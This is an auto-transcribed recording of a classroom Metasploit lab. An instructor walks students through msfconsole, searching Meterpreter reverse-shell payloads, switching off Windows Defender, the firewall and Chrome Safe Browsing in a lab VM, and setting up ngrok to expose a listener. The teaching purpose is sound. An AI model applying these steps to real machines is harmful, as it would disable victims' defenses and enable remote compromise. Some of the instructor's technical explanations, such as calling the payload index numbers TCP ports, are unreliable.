All right, here we go. All right, so went ahead and clicked on. I'll look at manual with the pelace, or sorry, please. Of course, I would prefer asking. I mean, sure, I would have gone ahead and just done it without recording, but it's like I'd rather do this for you guys and gals to kind of follow back, fall back on this and use this as a reference guide for yourselves. All right. Um, so just confirming everybody's able to see my screen. It's showing the background and purpose page on Codio. Cool, cool, cool. All right. So as you guys saw and heard from Lakidra, she went over what Metasploit is, what we're going to be doing here, and how we're going to run this, right? So if you guys go ahead and launch that, go to page number 4. And as you see right here, how it has the virtual machine on the left tab, as well as the terminal on the right, you're all set. There's really not much that you have to worry about. Yes. Please be patient with Codio. It is it's like Schrodinger's cat. It's dead or alive one way or another. So, fun times. Oh boy. So, let's go ahead and kind of follow through, right? So in this section, we're going to learn the basis of Metasploit and using the MSF console, which is Metasploit itself. So if you guys haven't done so yourselves, you're going to go ahead and run sudo msf, console, hit enter. Now, some of you may see somewhere within there, it says that you need to run MSF update. Go ahead and do that after you've launched it. It should run the update, type exit, and then again, sudo msf, launch it again,
You said run the update.
Is it saying run the update for you, Nito?
It said consider running an update to the
Yeah,
latest version.
yeah,
So just
you
type
can.
that in there.
Yeah, so just type in MSF update all together and then just hit enter. It's gonna run through, do the update process. It takes quick hot second, maybe a cool minute, depends. And then afterwards you can either type in exit or just type in clear and it'll kind of clear your browser screen or your terminal screen and it gives you like the MSF console either way on the very top. All right. Everybody else okay?
Okay, so it's still doing it now.
All right, cool.
It's unpacking
Yeah,
the
it's gonna
Metasploit
take a hot
framework.
second. All right, cool,
Okay,
cool, cool.
so after that I do sudo clear and then put the sudo mf. I mean,
No, does yours still say MSF6 like it says on my screen right here? Does it still say that?
let me see if I can see a screen bigger real quick. I have it on split screen.
Oh yeah, no worries, you're good. All
MS.
right, cool, cool, cool. Filippo is updating as well. Cool.
Why it's still unpacking?
Yep, I told you it's gonna take either a hot second or a cool minute. It just depends.
I'm like, I have a brand new gaming computer.
Trust me, I got a decent, gaming PC that I've had for the last year and a half, and it's not based off of that. It's based off of what Codio runs. So that's the only downside. So it's not your PC, it's literally Codio itself. And the other thing too
Yeah,
that I can explain
mine is all
is,
done, but I don't. It doesn't show the MSF6.
oh, it doesn't show MSF6.
No.
So
Yeah.
you ran, did you run sudo MSF console first? Then if it prompted you for the update, you then ran it again for the MSF update?
Yeah, I did the update. So after the update, am I supposed to do something else?
Mine says run MS because it says run MSF console to get started after updated. And then I see the
Gotcha. Feel
MS
free feel
is
free to
there.
share feel free to share any screenshots and stuff into the chat or if you want to share it on Slack too, I can take a look to see what yours shows.
No, it's
David,
posted
yep,
soon.
David, yours is fine. The huge heart with the M in it, that's just basically one of the multiple images that it creates, like this one right here. It says MSF. It does that. So you should be good to
Okay.
go. Yeah, so if it shows like an image like this, but it doesn't show like this on the bottom, so it probably just needs to be ran again. You could always just type refresh your browser and then run it again. All right, cool. Good job, Noel.
I think
All
I'm
right, Lash, you're updating. It takes a while to update, but I'm good. All right, cool, Scott. Just wanted to make sure. What about
so
you,
I think
Filippo?
at the end you said I should just see where you're at where it says MSM. What?
MSF6, yeah. It should
Okay.
show that.
All
Yeah.
right.
How about you, Filippo? You good? Or is it still not showing it?
No, it says starting the Metasploit framework
Yeah.
console.
And it kind of looks like it's going through upper lowercase letters as it's
Yes.
like yep, that's all it is. That's how it's gonna look. It's gonna look really weird. And like I said, everybody gets a different image. Either you got an MSF there, you get a heart like David, sometimes you get a bunny rabbit, a ninja. It does a bunch of different images. So it's a fun little thing that it does as a loader, you know? So it's really cool.
Cool. Yeah, mine's a duck.
Yeah, there you go. See? You're quacking away. All right. So if you guys want to, you can go ahead and type in help. It kind of shows you the tools and options that you have with Metasploit. It'll bring you all the way down to the very bottom, but I'm going to go ahead and scroll up to kind of show the same example as you see side by side.
You said
So
help.
yes, just type in help, hit enter, and it shows you the commands that you have available to you. So you have a help menu with just the question mark. You can type that in and hit enter. It shows you that. Has banner, change directory, the toggle color for like how you want your text to be, connecting to a specific host, debugging, etc. Like you see all those commands. So you guys can take some time, when you're free and you want to kind of go back to this, take some time, look at it, see what kind of commands you can mess with and do
Oh, okay.
you know. There's module commands too, so there's like more deeper
Okay.
things that you can run. And this is more like down the line. And then there's like specific commands that you can run for jobs that you're trying to run. So like you're trying to see what kind of payload handler you have as a job, specific jobs that you already have running, and you want to see like how to manage them, as well as killing those specific jobs. So like if you do kill, there's like PID, which is like the program ID, and you just type that in, it kills that specific job or that program that you're running. Same thing goes with like renaming a job. If you want to rename it from, PID 265 to like PID, hack the system with like numbers and letters, you can do that. But as you can see, these are like the specific commands you guys can do at a later time or even just try to mess with. So I'll give you guys a chance to do that at a later time. I'm going to go ahead and progress a little further. All right. So we're already at our first question. Type in grep interpreter search TCP. Now I'm going to go ahead and type it on my side. You guys feel free to do it yourself, guys and gals. TCP. Boom. Oh, that is a lot of info, right?
Oh yeah. I
Oh
never
yeah.
happened, but it was
Yeah.
it just took a moment, but yeah.
Yeah. It slaps you with a bunch of information, but if you guys remember what TCP is and what it kind of calls for, it shows you that information. So, based on the information shown using the grep command, what does it do? What does it pull up? Kind of give a brief explanation. And feel free to answer it now in your lab. Go ahead and submit it when you want to, or if not, just leave it there and just wait to submit it. If you feel comfortable now, do so. Otherwise, don't worry about it. But if you
So
guys go ahead.
Nothing happened. I typed that in.
You
Mm,
typed in grep, GREP space meter preter, brief brief way of saying it, and then search TCP.
Yes.
Ooh, okay.
Mm.
Can you send me a quick screenshot and let me see, David? Yep, I would say IP addresses, yes, but I don't see those there. I don't see IP addresses. It shows you the TCP port, maybe? You think that's what it'd be?
it showed in shell, reverse TCP inline,
Mm-hmm.
the stagger.
Yep. It shows you stuff about reverse TCP inlines, things that you can run separately. Let's see.
I see IPv6. Okay, so IPv6 stagger.
Yeah, so you could do different things. You see like the stuff that it runs, even HTTPS fetch. See if there's anything on the browser side of things. How about you, Filippo? Were you able to run it again? Is it still not showing?
I guess it has a delay because
It's
now
like,
it
Mm.
suddenly showed up.
I am telling you, take Codio with like a grain of salt and a whole lot of patience because it's fascinating. Manuel, so grep searches file patterns. You could say that it searches file patterns in both Linux and Windows. It shows what kind of things you can run in order to basically in order to use TCP, right? And how to exploit those. David, is it types of payloads for different ways to exploit a computer? Yep, pretty much. I mean, that's basically what I just said, but you said it in a more smart way. All right, so you guys kind of like understand now like how that goes when you run the grep command, right?
I have a question.
Sure, go ahead.
What is when it's showing like all the payloads and it has a number before? What does that number represent before the payloads?
That is the TCP port.
Oh, that's a TC port. Okay.
TCP port, or if not, it might be just a file folder, like a type of payload that it can run.
Okay.
Yeah, it just depends on how you're able to interpret the information. I normally call it the TCP port because that's where it's trying to look for that information and how it's going to run towards the system that you're trying to access. So, like say for example here, 570 is a payload that uses command prompt using Windows operating system on PowerShell, and it patches the interpreter using the reverse IPv6 shell of TCP. Like I hope that kind of makes sense.
Yeah, see, that was the hard part. It's like when I practiced this before, it's like I looked at this, but I didn't really know what any of it meant. And I did some YouTube videos, but it didn't go over the same commands like the ones we did. So
I still don't know what all of this means. I was just like, okay.
Yeah, it's a whole lot of new business. Like I said, you don't have to like know this per se because this is just more of like understanding how the real life challenges is in cybersecurity, how these exposures of accessing systems and hacking them and doing everything that you need to do in order to protect yourselves and protect your systems yourselves as well as the businesses that you work for, you know?
Uh-huh.
So
But like
nice.
when I asked that question, what information does it show you? It's kind of hard to answer because I don't know everything
It
that this
answer to the
information.
best. I would say it's just answer to the best of your ability since it is a free write question. So just answer to
Uh-huh.
the best of your ability, like how you understand it, how you interpret this information that's on screen. So you can say like how I said it, where it's like ports and like there you go. See, Douglas kind of puts a good way of putting it: ports and protocols and payloads that can be used. It's basically different type of file patterns, and there you go. Look at Scott got another one too. See. And again, guys, feel free to bounce off ideas with one another. There's no right or wrong answer in a sense here, especially with Metasploit, because it's a myriad and mixture of different things here and there. So it's not something that you need to focus on remembering when doing the test for the Security Plus certification. This is just like I said, this is more of like, hey, look at real time, real information, getting used to this, learning how to, protect yourselves and how attackers use these and these tools in order to attack vulnerable systems. So I hope that helps. Does that help, Cindy? I hope I answered your question to the best of my
Yeah,
ability.
that helps. Thank you. Thank
Awesome.
you.
You're very welcome. All right. So we're on step number 4 now, right? So as you can see right here, it shows you all the TCP information. So for this lab, we're going to be using Windows/Meterpreter reverse HTTPS, which is the reverse shell for web browsers, right? HTTPS protocols. So which is one of the most powerful features on the Metasploit frame. So there's a number of possibilities once someone successfully is connected to a remote computer on a client computer itself. There you go. See, Shernet, that's a good one too. I hope I pronounced your name right. Shernet. Chernit? Chernit or Shernet? Because it could be both, but correct me if I'm wrong. Or yell at me later. I don't care. I just want to make sure I pronounce your name right. That's all. But so we'll go ahead and go into step 4. We're going to type in info space Windows interpreter reverse HTTPS. Oh, thank you. Awesome. All right. And you don't have to type it out. You can just select, copy, and you should be able to paste. There you go. Cool. Nice. So that is the payload we selected to run. Info Windows interpreter reverse HTTPS. Is it? Oh, HTTP. Yeah, HTTP. So as you can see right here, this is the type of payload that we're going to be running. It is a reflection injection using a reverse HTTP stager using WinINet. And see how it gives you the information of what type of payload it is, what it's going to run.
I got an error.
Oh, what kind of error did you get?
Error while running command info. Cannot load such file.
Any chance you can send a screenshot either here in the chat or if not in Slack, however it makes it easier for you, just to kind of see what you're working with, and then maybe we can, cross-reference. Maybe somebody else. You got the same error? Okay, so you guys typed in this or threw this into the command, and it still does the same thing. Info, Windows interpreter, HTTP, error while running this command. Oh, interesting. And David, that was for you. That was well, actually no, for you, Manuel, and uh Xavier. Anybody who's getting the error. Did you guys run the? Well, I know that you did, Nito, running the update, and it still gives you that error.
Okay, where do you want me to put the screenshot?
You just throw it here in the chat, in the Zoom chat if you can. If not, then you can send it into Slack. You can send it to me directly. It's okay. Trying to see this error here. So error while running command info cannot load such file. Blah, blah, blah. So with info and everything.
Yeah, that one.
That is odd. Okay, so Filippo's good. Manuel, David, Douglas. Okay. Let me do some digging here. All right. Few students. Okay, so David got that. Okay, give me 1 second here. So I have a few students on break 8. Let's see here. Running. Let's see here. Nope. Trying to do. And thank you for that, Manuel. I'm gonna go ahead and copy. Nope. Okay, I can't copy it. Oh, I think you gave me a different screenshot there, Nito.
I just did the whole thing.
Yeah, you gave me the screen, but it looks like you're showing me a different page. It looks like text info from something on SBB.
Oh, you're right.
I mean, it's okay. I don't mind learning that too. Let me see here.
Esports. A moment.
No, you're good.
Take two. Weird.
Yes, very weird. All right, cool. At
Oh my gosh.
Okay. So okay. If anything, do a quick refresh of your browser screen. Try running Metasploit again, the MSF console, sudo MSF console, and then try
So
it
you say
again.
refresh the browser and then just try to run it again?
Yeah. Or actually, I'm gonna try something myself. Let's see,
Okay.
CLS. So clear. What if I do MSF console? I'm gonna see if it does something similar
I
to
have
what.
to start over and put the
No, you could always hit the up key or up arrow on your keyboard, and it actually kind of runs the commands again, whatever you have. I'm just waiting to hear back from people. Let me see here. Copy here. Same thing.
No, I don't think so. Now I got bash info command not found.
Oh, but did you?
So it looks like I gotta run everything again.
Got it. Control C. So sudo msf. Nope, not msf install console. All right. I'm glad that you are, Daquans. All right. Anybody else still having the error? Aside from the few that we know?
It's starting the Metasploit framework. I had to start it over.
Yeah, no, you're good.
So it's just thinking.
Mm-hmm. I'm also waiting to hear back from TAs and such. So that way we can kind of get an understanding. Yeah, of course. It's always a good learning experience. You learn from the experience of others and you get to see, things in real time. All right, all right, all right. Still waiting on a response. All right, cool. So
All right. All right, I'm trying to put that in again
it
now.
you might have put it in one too many times, so you might want to wait a bit, David, for yours. Maybe that's what it is. It's trying to gather that info. So let's see. So grep and
Oh,
then
it's slow.
info. Okay, so it did it. It still did it for me, and that was after doing the update too, and I did that earlier just in case. Let me see. I'm waiting to hear back still. Nothing yet. Boop, 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 boop. All right. Let's see who else was having the issue. So David, you already tried doing it. Manuel, how's it going for you? Did you refresh and try running it again? Michael, you good too? It worked for you?
Yeah, I'm good. It works for me.
Okay, cool, cool. I just want to double check and make sure.
All right.
All right. Let's see.
Um,
So Manuel
I typed in
says
the info windows. Uh, meta, the meta
interpreter.
predator. Yeah,
So did you try just copying and pasting the command from like on the right side of the screen over to the
yeah,
left?
that's what I've been doing. I just been
Okay.
copying over. So I did it, and I'm guessing I'm just waiting for it to populate.
Yeah, it's gonna populate
Nothing's
the info.
happening, so
Like I said,
yeah.
Codio is slower than molasses in wintertime. So, or slower than LA traffic. I mean, you could put it however you want.
Oh no, not LA traffic.
I mean, I'm originally from SoCal, so so I
I was
know
out
how
there
it
10
is.
years. I've been in school out there. Hello.
Yeah, all good, Manuel. No worries. You're good. Douglas, you're restarting it. All right. All right. So if you want, for those who are unable to run Metasploit with the info Windows interpreter, um, give me a moment. I'm gonna keep going so that we can kind of like proceed with the lab, and then I'll go back and help you guys out if anything individually or separately, however we can. But we'll go from there. Is that okay with you guys, or do you want me to wait for any of those who are unable to run Metasploit? I just want to make sure you guys are all learning at the same pace.
Is it the majority of us that are having this issue?
I don't think so. I mean, I want to say maybe like a few, maybe like a handful. All right, I could go back later on and kind of help you guys out for those who need it. Let's see. So it looks like Chanel, Scott, David, uh, Douglas, and Manuel. So that's so far like five, literally handful. All right,
What's that?
I'm gonna proceed for right now, just for the meantime, and then I'll go back and help. Again, we can go over it again and run it. All right, cool. All right, so step four, we already did that, right? So now that we have the information about the payload, now we want to set the payload and use that payload for when we, create our attack, right? So we hit set, and there it is. No entries in data store. So the set command should allow you to configure the framework options and parameters for the current module that you're working with, right? So now we're going to go ahead and hit exit. So on the next screen, we're going to go back to the MSF console, right? But for now, we're going to want to go into the virtual machine, your Windows virtual machine, right? So go ahead and click on that. Now, mine looks a little bit different because I have a dark screen kind of thing to help me with my vision because I know not everybody loves bright colored screens and so on. So pair with me here. I'm going to see if I can do a backup dark reader thing. Okay, cool. There you go. Dark reader doesn't really work. Just FYI,
Ah,
guys, if you're using
we're,
add-ins.
we're supposed to see after we do set, no entries in data store, right?
Yeah, that should be fine.
Okay.
Okay. So after you do that, you just type in exit exit from the MSF console, and then you're going to go over to your virtual machine. So in your virtual machine, we're going to manually disable your security protocols that allow the system to protect you from any exploits, vulnerabilities, and etc. Right? So since we are in this Windows virtual machine, we're going to go ahead and type, or not type in, but click on the start menu. And we're going to want to look for Windows security. If you don't see it here, you can just type in Windows. Should pop up here somewhere. If not, security. There it is. Oh, it doesn't look like it's actually installed. Oh, never mind. It is. All right. So this is for those of us who use Windows, we already know this is where we have our basic, or if not generic, Windows antivirus and protection for any threats and stuff that we have on our system. So we're going to go ahead and click on virus and threat protection. We can hit scan now, but I'm just going to go ahead and do this.
Click scan.
So virus and threat protection, right? And under virus and threat protection settings, we're going to click on manage settings. So down here, manage settings.
Mhm.
And then you're going to go ahead and do the unthinkable. Switch off the real-time protection.
My computer said no.
Your computer's going to tell you, no, no touch, no touchy, no tiki, no laundry kind of thing. All right. So we disabled virus protection. We are vulnerable, like Bambi in the woods. Next, we're going to go ahead and go into control panel, and we're going to go ahead and disable the firewall for Windows Defender. So control panel, you could do control panel. I normally would just do Windows, there we go, firewall, and
You do Windows. You said Defender.
yeah, Windows Defender firewall. Actually, no, this is more advanced. So let's just go into control settings then.
Okay.
We'll just go into control panel. And under control panel, you're going to want to go into system and security. And again, guys, if guys and gals, if I'm going too fast, please let me know. I can slow down, bit by bit. But otherwise, Windows Defender Firewall, go ahead and click on that. And then where it says turn Windows Defender Firewall on or off. Oh no, the unthinkable yet again. So under private network settings, you're going to go ahead and turn it off, which is not recommended, as it says right here, not recommended. And the same goes for public network settings. You're going to turn it off as well. So off and off, right? Once we're done, we're going to go ahead and click on OK. Now, one
We
other
see
thing we got
red.
to do. What was that?
I said that we see red.
I know. The only red that we'll ever see in this whole environment is just security, just not protecting you. So now we're going to go ahead and disable Google security protection, right? So we're going to go ahead and open up Chrome. We're going to go ahead and click on the three dots. Oh, of course. Yeah. Got it. Cool. So we're going to go click here. And it says to click the update icon. Okay. Well, it's the three dots or hamburger menu, however you see it.
Let's
Drop
see.
down to settings. And where is my settings? Ah, there you are.
Settings, privacy, security.
Yep. Privacy and security. Exactly. There you are. We're going to click on security. There we go. And we're going to go ahead and click on no protection. Are you sure? Yes. Turn it off. All right. That's it. Now, later on, you can turn these on, but the virtual
no.
machines themselves get reset. So you don't have to truly worry about it. But just don't do this onto, like I said, like we said, Lakidra, and then as well as myself, don't do this onto your personal machine. This is highly unstable and something that we don't recommend doing. So that's just forewarning. All right,
Aren't we
everybody
doing
up?
this on our personal machine right now?
No, please don't. Please don't do
Wait.
this on your personal machine. You should be doing this in the virtual machine.
Oh, so I just turned everything off and
There we go. See? Now we know.
wait. Okay, so let me go ahead and turn it back on.
Yeah, go ahead. Just go in reverse, turn everything back on. You should be good to go. See? Everybody, it's a learning experience.
What?
Yeah, who needs antivirus, right?
That's why I'm like, my computer's like, no.
See, your computer is gonna be angry with you, be like, oh, you're trying to let me get infected.
Okay, let me get back in here.
Awesome, awesome.
How did you get to settings? I can't find, when you double clicked on the Google, like I
Okay.
can't get settings.
All right, so I'm gonna double click.
Oh,
You see
God.
the three dots in the top right corner right here?
Let me click. Okay, so let me see. I double click. Okay, what three? Show me. Okay. Okay, yes, I see.
Then you're just gonna hover your mouse at the very bottom because the menu itself hides. So if you hover close to the bottom, it
Settings,
then
yeah.
takes you
Just
to.
a minute, I'm on Zoom. My daughter's banging on the door. I'm so sorry. Go ahead.
It's
Okay.
okay, don't worry. I got two kids upstairs plus their mother who tends to come down
Okay.
here. So you're gonna hover your mouse kind of close to the bottom. It kind of moves the menu down, and then it takes you to where it says Help, Settings, and Exit. So settings should be right there. So here, I'll do it again. So see how it shows it like this? Like
Yeah.
this, and there's that tiny little arrow at the very bottom. As soon as you start to hover down towards it, it moves the menu down.
Okay. And
And then
then
settings.
settings. Okay.
Yep. Were you able to see it?
Yeah.
Awesome.
And I
Sweet.
click that. Okay.
Yep. So
Okay.
settings, and then you're gonna go down over here.
Oh,
You
virtual
should see something that
machine.
says privacy and security. It should be the third one on the left-hand side.
Yeah, privacy and security. Okay.
Yep. You scroll down a little bit, right between add privacy and site settings, security.
Okay.
And you scroll down a little bit more. You have three options. The standard protection is already enabled. You're going to want to disable it to no protection, which it says not recommended. Just click that.
Okay.
And then that's it.
Okay. Turn off. Okay.
Yep.
Okay.
And then you can close the browser if you want to keep it open. Dealer's
Okay.
choice.
I
Okay.
really just did that on my computer.
All right. So, all right. So the three little dots. Okay. I was like, where in the world did you get that? I was like, oh my God.
Now,
Okay.
now here's my question, Cindy, because we don't want to repeat. You're doing this on the virtual machine, right?
Totally.
Okay,
Totally.
just making sure.
I know I
just
was
want to
so
make sure.
bummed because I was leaving for work. So when we did the breakout groups, I wasn't quite home yet. So on my hard computer, I can record you. So I'm like, oh man, I'm so bummed because now
Yeah, that's
thank
why
God
I
you're
said.
recording. So
Yeah, that's why I offer it. I always like to offer it as much as I can and when I
yes,
can. All
yes,
right.
yes, yes, yes.
All
Okay.
right. Can I get any thumbs up from anybody else who's already at that spot? We already disabled the security on Windows as well as in Google Chrome. We're all good to go?
I'm working on it. Almost done. Almost done.
I'm still stuck in the Google Chrome.
Chrome is frozen? Oof.
Mhm.
All right, Douglas. Wumbo ready to go.
Yeah, I'm still stuck on Google Chrome.
Google Chrome still trying to load?
What did you guys want?
Sounds like my mom. All right.
Okay. Okay, we're going to security. Where is security at? Oh, privacy and security.
Yeah. All right. Let me see here. Page 4.
Security. And then we want to put that on no protection. Okay.
Page 4.
Okay, and then we just exit out of it. Windows.
Yeah. After you disable the settings in the virtual machine, that's all it is. You just exit out from it. Can't get it to close. Just give it a second. Like I said, slower than molasses, slower than a stick in the mud, trying to pull it out and it's deeply dug in there,
I just want to make sure I did everything, put my stuff back.
Yep. Go ahead. All right.
So where's the update icon?
So it's not technically called it's everybody else calls it an update, or at least some of us who created this, but it's not really the update. It's just the three ellipses or the three dots, top right corner, right underneath your X,
Okay.
and then you click that. So it
All
shows
right.
you the basic like sub menu, but it's minimized in a sense. So you're gonna have to hover down a little bit lower to where you see like the little arrow. See how at the very top right here has like a little arrow. So you hover down and it should be second to last right here. It says settings.
Oh, okay, okay,
Yeah.
okay.
So just go there, settings, privacy and security on the left hand side, third one down. Scroll down. Should be
All
second
right.
to last again, security.
Okay.
And then it should already be enabled to standard protection. You're going to want to disable it to have no protection. Though it says not recommended, just disable it for now. Once you've clicked it, you don't have to do anything else. You could close out of the browser window. You can leave it open. I normally like to leave it closed because, again, like Douglas, he's not able to close it, but it's going to slow down the system a little bit.
I,
Douglas, good to go, or is it still not closing?
I have a quick question.
And I
Um,
have an answer, I hope.
I had because I turned off everything on my actual computer,
Uh-huh.
and I was trying to go back and put everything back on.
Mhm.
On the virtual machine, the security on the Chrome is standard. Not sure is mine or was it on? By default, is it actually on like the one
By
above?
default, by
100?
default, it should be on standard if it's on your local machine, not the virtual machine.
Okay,
Yeah,
so I put
standard
it
is
on.
always going to be what it's usually enabled.
Let me go back. I imagine the other one I put it on is too strict. What is that? Enhanced protection? Okay.
What was that?
I think I put it on enhanced protection, but I'm guessing that's too strict. So I'm putting
Yeah,
it
that's
back.
too strict. It's really going to limit some of your browsing ability.
Okay, cool. Thank you, thank you.
And I'm responding to some of the other TAs that it may have gotten this error or not. So trying to help anybody who else got the error before. Requirement recommendation and when
Hello, I just got on.
and gives us error. Oops. Info such. All right. Whoop. All right. Cool. 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 Yes, Alan. What was that? I'm sorry.
I said I just got on.
Oh, you just got on to what specifically to the virtual machine or to the terminal?
Just I just got started.
Okay. So where are you at in the sense of like the lab itself? Are you still on page 3 or 4? Okay. Douglas, if you need to restart the VM, yeah, just click restart the VM. If you already disabled the security settings, I think it should still stay there and appended. Otherwise, if it doesn't, I just recommend just kind of do it again. All right, good, Michael. Yep. All right, cool. All right. So, Alan, what part were you at again? Were you on page 3, kind of knowing about Metasploit and such, and then running the Metasploit command?
I'm about to get up. I'm about to get to it right now.
Okay, cool. If you want, I'm gonna go ahead and proceed a little bit more because I want to make sure you guys get a break and kind of get far enough to where we can get ourselves prepared to run the exploit onto the Windows machine. So I'll probably end up going back. I'll probably end up, going back a little bit, kind of rerunning everything again. I'll refresh it on mine and see if I get any errors again. So if that's okay with you. And like I said,
That's fine.
I'm recording this as well, so I'll send this out to anybody that I have regarding the breakout room, and that way you guys can follow along again, okay?
Okay.
Hey, Matthew.
Yes, yes.
Popping my head in, trying to see if I could help with the troubleshooting.
Yes.
For the people that are having the error come up, did they update the MSF console?
Yes.
Yes.
Yes. There was a few that had, I think it was like a handful, literally like 5 or 6. They ran MSF update after they ran sudo MSF console, and they did the update. They cleared the screen, exited, and then relaunched it again after running sudo. And it after they ran the other 2 commands and then info, they still got that same error.
Okay, so for the people that did not update, are they receiving the error?
I do believe everybody ran the update. I recommended it at the very
Okay.
beginning. So
Okay.
looks like Aristides wasn't
Got
able
you.
to. Scott got an update. Scott ran the update and he got an error. Okay. And then I also recommended to kind of do a quick refresh too of like their initial browser itself, not the terminal, but I had them do a refresh of the browser itself and maybe like
Yeah.
reset the terminal tray again.
If you're putting in that you're not getting any errors, can you also tell me if you did the update or not? That would be very helpful. Thank you. Did
So
the update, no errors, updated, didn't get any errors. I'm wondering if it is a spacing issue possibly.
I also
Um,
recommended to just highlight, copy, and paste into the terminal too. If that,
Sometimes that doesn't work great in Codio,
That's what
unfortunately.
we did do.
Yeah, unfortunately, that sometimes is not foolproof because sometimes Codio will add a little space in there where they shouldn't. So I would recommend if you can type it out.
Mhm.
Um, and then see, because I am not seeing like a through line. You know what I
Yeah.
mean? Like
No, I got you. No, I got you. I did it too. Like I did this preemptively, of course, so
Mhm.
that's where I can't say I experienced the issue. But
Right.
I ran the update, I ran the code, and it's like, okay, cool, everything's working. We'll wait for
Mhm.
the rest of it to kind of go with the class. So I already mentioned it to them too. I'm recording this for them. I advise that later on they could try themselves, go over the video and see if they get the same error again, and then to reach out to their TAs and such.
Right. I think that would probably be the
Mhm.
best course of action
Yeah,
here.
of course, of
Yeah,
course.
of course.
And it looks like Lash also got the same error too. Even after running the update, I'm guessing, and typed it out manually, still got the error. So
Okay.
yeah, but
Okay.
but yeah, guys, like I mentioned, this is all being recorded. I'll send it to everybody, or share the video itself, and we'll probably be able to kind of go over it again at your own pace, at your own time. It could be like Lakeisha said, it's either a spacing issue, a copy paste issue. It could be just something, the Codio terminal itself. It's like I said, Codio is like I said, you got to take it with a grain of salt and with a whole lot of patience. So it looks like, yeah, see, like Nito had that issue too, refreshed it, ran everything all over again, and it started working. So could be just a Codio thing. But all right, so let me see here. So we were at page 5. We already disabled everything. We're going to go ahead and proceed and launching Metasploit via terminal one more time. All right, so we're in terminal. We're down here. We're going to go ahead and type the following command within the Codio terminal itself. Usually you can copy and paste it. So we can go ahead and try to paste it in here.
We're
Works.
sick.
So it works for me, but let's see, this is to install it from what it looks like.
Okay, so we're on 6 and 1, right?
Yes.
Thank you.
Yep, you're welcome.
So I'm gonna copy that.
So
That's the
copy it.
one. Switching to root user to update the package, adding.
Yep. So same
Oh,
thing that you got. I'm doing the same thing too. So we're all in this together, folks. If you understood that reference, you
did you got
now now you all know my age.
did you got 0 to remove and 65 not upgraded?
Yep.
Okay.
Yep. So it looks like it's already installed. It's already running the latest update or latest updated version of Metasploit, so you should be good to go.
Okay.
All right.
Thank you for your patience.
Of course. And that's all I have. I mean, I have 2 kids. I have to have patience. Otherwise, I'd go crazy, pull my hair out. All right. So we're going to go ahead and launch the MSF console again. And as you guys remember, you got to run it as sudo MSF console. And with enough
At the very,
patience,
I have a question. At the very bottom, I ran what you said. I copied it and I pasted it, and then it says adding mess whatever framework to your
yep.
respiratory list file. Then it says Mestapot framework GPG exist. Overwrite yes or no.
Ah. So if you didn't run the update, you can hit Y for yes. If you did do the update and it's still telling you that, just hit yes. Either way, like just continue.
Okay.
It'll probably
Okay.
just reinstall it, or if not, it'll bypass and saying, "Oh, you already have all the latest updates and such." move forward.
Yeah, I kept playing with this like 3 days ago, and I've been playing with it ever since. And I keep having errors. But okay, so I hit yes, and it's thinking. Okay, so now I can go ahead and type in the sudo again.
Yep, sudo mfs
Okay.
console. Make sure there's a space between the sudo and mfs. Yeah. And look at that. I got the bunny rabbit this time. Cool. Wake up, Neo. The Matrix has you. Follow the white rabbit. Love it. Love it. Love it. Love it. All right. You got the bull. As long as you don't get the horns, you'll be fine, David. All right. And look at that. I got the same as the screenshot.
Nothing happened.
Oh, you got to give it a second. Is it still thinking?
Okay, yeah, you know what, there it goes. Well, so
I'm-
yeah, so now it just has MSF6 and then the greater sign.
Yep. Like I said, it's Codio. It takes a while. Gotta take
So
your
should I
patience.
put the sudo back in again or no?
No, as long as you have MSF6 with the greater sign, you're already within Metasploit. They're running
Okay.
it. So
Okay.
so as you guys know, the goal for this lab is to attack a Windows 10 machine. And for this, you'll need to use Metasploit to develop a specific payload. Metasploit
Okay.
uses multiple payloads, and one of the popular ones is Meterpreter, right? Alan, if you're in the introduction page, just go ahead and just go over to page 4. You're gonna kind of see how Metasploit is ran, what it looks like, the specific commands that are there, and just go from there, you know? Just take your time, take some patience with it too. Make sure that if it says MSF update is recommended, go ahead and run it after you run sudo space MSF console, run the update, type clear, and then just continue from there. It's going to have the latest update. You can hit exit and then go back into it again, just depending on how you feel. Yes, Wumbo, we Wumbo, he, she, we Wumbo, the study of Wombology today. So Interpreter is a Metasploit attack payload that provides an interactive shell, like CLI. It also is referred as a reverse shell from which an attacker can explore the target machine and execute code, right? So a lot of you can question the practicality of this and set up this type of attack in your own environment. So we already disabled the built-in protections within the virtual machine itself for this lab. And then the reason why we're doing this is to kind of see how the attacker is going to get into the machine and how we can defend based off of those experiences, right? So, of course, in the wild, often the case that several vulnerabilities are used in conjunction to fully exploit a machine. And in this stage, this lab will show you how a single vulnerability and the lack of host-based defensive measures can lead to a threat actor compromising a machine. So you'll be able to see it firsthand. All right. So we're going to go ahead and create a payload with ngrok, right? So ngrok is a cross-platform application that enables developers to expose a local development server to the internet with minimal effort. Maximum potential, minimal effort. Right? So many of us are using the same token in step 5, right? So it's a long hash after the add-auth token. So you may need to create your own ngrok account. Did you guys already go ahead and do that?
No.
No.
I did do that, yes.
Awesome, awesome, awesome. Anybody else who did not do that? Scott did, Lash, Michael. Take some time to do it if you can,
Where
please.
do I go for that?
So it's ngrok. So here
.com?
So ngrok. Yep.
ngrok.
Let's see. I believe unified. I believe that's what it was.
Yeah, ngrok.com. Okay.
Yep, ngrok.com. I believe that's what it is.
And sign up for free
Yep. Sign up for free.
or use Google. We're gonna do that real quick.
Yep.
There we go. Continue.
Go ahead and use my correlation 1 email. I'm not a robot. Oh, I gotta love these captchas, right? Boop, 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 boop. Buses. Oh my God, a motorcycle? What's next? Watch, I'm gonna miss one of them. Haha. So they have gotten better. There used to be captchas that if you miss one image or even just miss like just choose the wrong one, it'll still bypass and continue. If you want, try to complete it now. I'm gonna try to do it myself to see if we can kind of meet in the middle, see if I get any errors, and that way we're prepared for the next time, right? Verify. Boop boop boop. Here we go. Sign up.
Reason is for and Grok for production or development? Production, right?
I want to say development. It didn't say. I don't believe
Okay,
it said that.
it's asking all these questions when you sign up. Oh, so we
So
have to install this on our computer, or
yeah, but
no?
there's a step by step here, but you would do it through the virtual machine, I believe. But
Okay, I did sign up for an account.
here's the instructions. You were detected as a bot. Dang it. See, I knew you were AI. But the instructions are right here too. There's a ways to kind of go around it as well, right? Sign up, blah blah blah, and Grok account. You use the MFA stuff to skip. So there's a PDF attached to this if you guys click on the here option. You can't see it because I have dark mode enabled. Like I said, dark mode is a unfortunate caveat when it comes to web browsing, especially if you don't like seeing bright screens. Yes, you will be using your own token for ngrok, as it says right here. Many people are using the same token on step 5, so it could end up, crashing, causing problems, or even authentication issues. So you might want to use your own.
Okay, you were using Grok to expose your local server ports. Cost
Mm.
500.
Yep.
Okay, so now I'm like, I signed up for the account.
